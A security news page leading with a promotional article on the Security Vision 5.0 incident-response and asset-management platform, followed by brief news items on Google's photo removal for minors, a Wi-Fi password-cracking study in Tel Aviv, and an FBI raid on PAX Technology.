Connect with us

Security Vision 5.0: The Swiss Knife in Information Security

Published

on

In this article, we will talk about the mechanisms that underlie the Security Vision 5.0 platform and allow you to automate any formalized process in the field of IT and information security.

Recently, the globally updated information security process management platform Security Vision 5.0 has entered the market. The changes have affected many aspects, from design and architecture to filling modules and principles of working with data, while the flexibility of the platform has not only been preserved, but also increased. In this article, we will talk about the mechanisms that underlie the platform and allow you to automate any formalized process in the field of IT and information security.

Object Oriented Approach

Most IRP / SOAR systems today are focused around one single object: the “incident”. Best practices recommend using CMDB for asset control, and Vulnerability Management System for vulnerability control. IDM will be responsible for accounts and GRC will be responsible for risks. Even if all these systems are in the company and each of them copes with its tasks, to obtain a comprehensive picture it will be necessary to do a lot of work: unload all the results of interest, bring them to a single data model and, based on this data, generate the necessary analytics. As a result, you never have a really up-to-date picture of what is happening – the situation can change dramatically immediately after you load the data into Excel. Needless to say

When it counts for minutes, and sometimes for seconds, incident response specialists simply do not have time for consolidated analytics from dozens of different sources, some of which are available only by calling the “possessor of sacred knowledge”. The owner of the system left for lunch – and now Initial Access turns into Lateral Movement .

But the list of types of objects of control in IB is not at all limited to the above. certifications, software and licenses, external service providers, user awareness companies, hardware inventory and obsolescence, changes, projects, Shadow IT and more. All this requires accounting and a special life cycle, for the successful functioning of which a well-coordinated interaction of employees and systems is required. It is for this reason that there are no restrictions on the types of control objects in our product, and it has become simple and convenient to create them.

The Security Vision platform can be delivered with pre-installed modules for managing incidents, assets, vulnerabilities, risks, specialized conformity assessments such as CII, PCI DSS, SWIFT, etc. These modules contain all the necessary objects, directories, dashboard workflows and reports.

But even the best analysts will not be able to think through every nuance of the customer’s infrastructure, take into account the peculiarities of the company’s internal processes, the requirements of regulators and business. For this reason, the main focus of our product is on the flexibility of any of the system elements. And this flexibility is available to the average user, without the involvement of a vendor or integrators. Without external scripts, right in the platform interface in NoCode or LowCode mode (in the case of integrations).

What does this flexibility look like in reality? Let’s consider several customization scenarios.

Incidents

Undoubtedly, the constantly growing number of incidents is becoming the main driver in information security automation. The process of their processing for the analyst should be as simple and clear as possible. He does not have time to read the string of incident properties in the hope of finding meaningful information. Depending on the type of incident, the focus should be on completely different inputs. For this reason, different types of incidents in the platform have completely different views in Security Vision.

Your existing incident handling process can be modified as part of your existing incident handling policy or procedure. For example, let’s add the attribute “Closing reason” to the incident card, which will be required to be filled in only if the status is “Waiting for closing confirmation”, and the ability to edit it will be available only to a user with the role “Information security incident manager”.

The calculation of the criticality of an incident can take into account any parameters of both the event itself and the objects involved in it.

In our case, the initial criticality of the incident and the criticality of the asset are used to calculate the criticality of the incident. For each of the incident types and information enrichment tools, you can assign your own criticality parameters and significance weights. You can use qualitative metrics or link the calculation to a quantitative risk assessment built in the company.

The field reflecting the quantitative assessment of potential damage can be hidden for employees of the first lines of support, making it available only to managers.

Properties of objects are available for layout in the card relative to each other, as well as for combining into semantic blocks and tabs. The data output form allows you to replace the values ​​with color indicators or icons for greater clarity.

One of the most interesting features of the platform interface is the ability to add graphic widgets directly to object cards. Chart the number of incidents by device or user involved in the incident, broken down by severity? See the timeline of a user’s VPN connection over the past month? No problem, adding such analytics to a specific type of incident has never been easier.

Most incident handling systems operate with tree-structured workflows. This means that our object can only move forward and never backward. However, it is often impossible to identify all involved accounts, hosts, IoCs in one pass. All stages of containment have already been carried out and it seems that the incident can be closed, but the Sandbox report reveals new objects, and the picture of the investigation completely changes. In such a situation, it is quite logical to return the incident to work.

In Securty Viison, incident handling reports are available for generation directly from the card. You can use ready-made report templates, such as the NKTsKI format, or customize your own, within the existing methodology in the company.

Integration

However, all of the above was mainly related to the interface. But the incident handling process gains real power thanks to the integration designer.

Today, a huge number of both paid and free services for enriching the available information are available for a SOC specialist. VirusTotal, Threat Crowd, Hybrid Analytics: – all these integrations are available by default in most IRP \ SOAR platforms. But let’s consider a situation where we want to add a new enrichment framework or just handle a new property that returns the API of the service we are interested in. To do this, you do not need to wait for a vendor’s response or write Python scripts. In Security Vision, we literally set up a connection in a couple of iterations and get the desired value.

All that remains is to add data retrieval to the incident handling workflow, choosing whether this action will be fully automatic or require manual activation of the function by the analyst.

But integrations aren’t just about friendly external APIs. Many infrastructure components are still difficult to integrate into automated procedures. For example, a Cisco cluster in Active-Passive mode will require access to the active IP address. How does the system know about the required connection parameters? The functionality of redundant connector configurations allows you to create additional configurations that will be applied if the main system is unavailable.

It is not always enough to get the data you need in just one step. Quite often, for example, in Sandbox systems, the following scenario occurs: 1. send the file being examined 2. get the request id 3. apply for the analysis status at regular intervals 4. and, finally, get the analysis results. But there are also more complex interactions, in which the data for authorization in the system must be obtained from Privileged Access Management and only after that the operations of interest must be carried out. The connector steps mechanism allows you to cope with such difficulties. The data from one step can be used as input parameters for the next. In Security Vision, functions of data transformation are available to the “meeting”: text, numeric, operations with arrays and structures.

If the company already has ready-made response tools in the form of scripts in PowerShell, Bash, Python or other scripting programming languages, then it will not be a problem to implement them into the platform. The script receives static values ​​or variables from system objects. The built-in regex, jpath, xpath and a number of other handlers will help you cope with any format of the returned data.

Many companies are faced with the problem of processing large reports, for example, from vulnerability scanners. The infrastructure scan file can be several gigabytes in size, but most systems are capable of processing files no larger than 100 MB. Security Vision connectors are able to cope even with such a task that is not solvable for many.

Complex report structures are another non-trivial task. For example, the scan policy and the credentials used are in one NameSpace, the plugins used are in the other, and the scan results are in the third. How to turn a report into a single table instead of 3 different ones? In Security Vision, this is very easy to do.

All the integrations described above can be performed both within the workflow and on a regular basis in the task scheduler. The results can be stored in the properties of objects, reference books or the platform can create new objects based on them: indicators of compromise, vulnerabilities, assets, or save their own types created by the user.

Assets

Having considered the functionality of creating objects, let’s now take a closer look at the part of it that is responsible for inventory and working with assets. In Security Vision, data sources about the assets being created can be any information storage available for integration: Active Directory, CMDB, virtualization management tools, or SIEM system asset models. Most often, the built-in mechanism of non-agentless scanning is used to identify systems.

In the absence of an account or unsuccessful authentication, the host can be identified by indirect signs: responses from services, information in Active Directory, or using custom rules (for example, based on the specifics of host names).

If authorization is successful, inventory scripts collect information about configuration, security status, software, updates, and other system components. All inventory scripts are written in bash and PowerShell, which allows any technician to familiarize themselves with their content, modify them to suit their needs, or search for problems in case of any errors and incorrect data received.

We have provided Security Vision with the ability to obtain information about user and groups, virtualization, startup and much more. However, if this information is not enough, the system allows you to add the retrieval of any system properties available for machine collection. Such custom operations can be implemented both by adding the necessary calls to the regular inventory process, or by creating a manual operation available from the asset card.

Our customers are often faced with the fact that inventory data is not enough even in disparate systems. What is the criticality of this system? Is it a productive environment or a test environment? Who is the business owner and who is the technical administrator? The collection of this kind of information from users can be built directly in Security Vision. The workflow will independently send a letter to the employee responsible for the inventory and the owner of the system with a reminder that it is necessary to fill in the required parameters. The system interface for such user roles can be configured in such a way that only the necessary menus and objects will be available for viewing and filling.

Any information contained in Security Vision can be presented in the form of reports and dashboards. The dashboard builder allows you to customize drill-down actions, for example, display a detailed description of a selected category or navigate to another related dashboard. The use of this designer does not require technical knowledge: the formation of analytics is similar to pivot tables and graphs in Excel. However, for more advanced statistics, we left the possibility of writing your own SQL queries right in the designer interface.

This is just a small list of tools that enable the Security Vision platform to optimize and automate almost any information security process. The flexibility of each of the elements allows you to implement scenarios for specific tasks of your company, without resting on the limits of the product and contractual individual revision.

Security Vision brings people and systems together in a single solution. This approach allows to achieve an unprecedented level of automation even in those processes that previously required significant human resources. Stay tuned for updates on our website: in the following articles we will tell you more about the SGRC module and its functions for working with audits, risks and compliance assessment, we will tell you how you can build a process for managing vulnerabilities and updates in the Security Vision platform, and also explain how the data, uploaded to the platform as part of the MITER ATT & CK framework and related projects can help increase the maturity level of your SOC division.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Security

New feature from Google allows minors to remove their photos from search

Published

on

This function was first introduced in August this year, but it has become widely available only now.

Google has launched a new security feature that allows individuals under the age of eighteen to submit requests to remove their photos from search results. For the first time, the company announced its plans to implement this function in August this year, but it has become widely available only now.

Anyone can start the process of deleting photos on this page support. To do this, you need to provide the URLs of the images that you want to remove from the search results, the search words for which the search engine gives these photos, the name and age of the minor, as well as the name of the person acting on his behalf, and the status (by whom, for example, parent, guardian, etc.).

As with other erasure requests, it is difficult to say what criteria Google will follow when making a decision. According to the company, images of all minors will be removed “except in cases of public interest or informational value.” It is difficult to say what this will mean in practice.

Based on Google’s wording, only requests from individuals who are currently under eighteen years of age will be accepted. It turns out that if a person is, say, thirty years old, then he will not be able to request the removal of photographs in which he is fifteen.

Google also notes that removing photos from search results does not mean removing them from the internet. The company advises users requesting deletion of snapshots to contact the webmaster first. However, if the appeal does not lead to anything, then removing images from Google search results will certainly be an important step.

Continue Reading

Security

Information security expert hacked Wi-Fi networks in Tel Aviv to find out their reliability

Published

on

The specialist managed to hack 73% of the 5 thousand studied wireless networks.

CyberArk employee Ido Hoorvitch conducted an interesting experiment to find out how strong passwords are for Wi-Fi networks in his hometown of Tel Aviv.

Using equipment to intercept Wi-Fi packets, Horwich collected a sample of 5,000 hashes of wireless networks and exploited a vulnerability to obtain PMKIDs (Pairwise Master Key Identifiers). To do this, he used a $ 50 NIC with monitoring and packet injection support and the WireShark tool.

PMKID is a hash generated using a password, access point MAC address, client MAC address, and wireless network name (SSID).

Horwich first tried to find out how many users had set their cell phone numbers as their wireless password (a common practice in Israel). To crack such a password, you just need to calculate all the combinations of numbers for Israeli phone numbers. Using a standard laptop, the researcher cracked 2,200 passwords; on average, breaking one password took 9 minutes.

Horwich then used the standard dictionary attack method. Using the Rockyou.txt dictionary, the expert managed to crack another 1,359 passwords (almost all of them used lowercase characters)

In total, Horwich was able to guess passwords to access 3,663 out of 5,000 (73%) of the studied wireless networks in Tel Aviv. The technical details of the study can be found here

Continue Reading

Security

The FBI raids the American office of PAX Technology

Published

on

The searches are related to the suspicion of the possible use of PAX equipment in cyberattacks.

Officials from the US Federal Bureau of Investigation raided the Florida office of PAX Technology, a Chinese PoS terminal manufacturer. How reported journalist Brian Krebs, the searches are related to reports of the possible use of PAX systems in cyber attacks against organizations in the United States and Europe.

PAX Technology is one of the world’s largest payment terminal manufacturers and a leading provider of trading solutions and services. The company is headquartered in Shenzhen, China.

According to information American radio station WOKV, the FBI and the Department of Homeland Security raided the PAX Technology warehouse in Jacksonville. Investigators said the searches were carried out on the basis of a court order as part of a federal investigation by the Department of Homeland Security with the participation of the Customs and Border Protection Directorate and the Naval Criminal Investigation Service. The FBI did not comment on the situation.

According to Krebs, citing trusted sources, the FBI launched an investigation into PAX after a major US payment service provider drew attention to strange network packets emanating from the company’s payment terminals. As it turned out, PAX terminals were used as a malware dropper and control infrastructure for organizing attacks and gathering information.

PAX Technology did not respond to Brian Krebs’s inquiry about the situation.

Two major financial providers in the US and UK have already begun to remove PAX terminals from the payment infrastructure, sources said.

“My sources say there is technical evidence for the use of terminals in cyberattacks. The packet sizes do not match the billing information they are supposed to send and do not correlate with the telemetry these devices are supposed to display in the event of a software update. PAX now claims the investigation is racially and politically motivated, ”the source said.

Krebs’ interlocutor did not provide details about the unusual network activity that led to the FBI investigation.

Continue Reading

Most Popular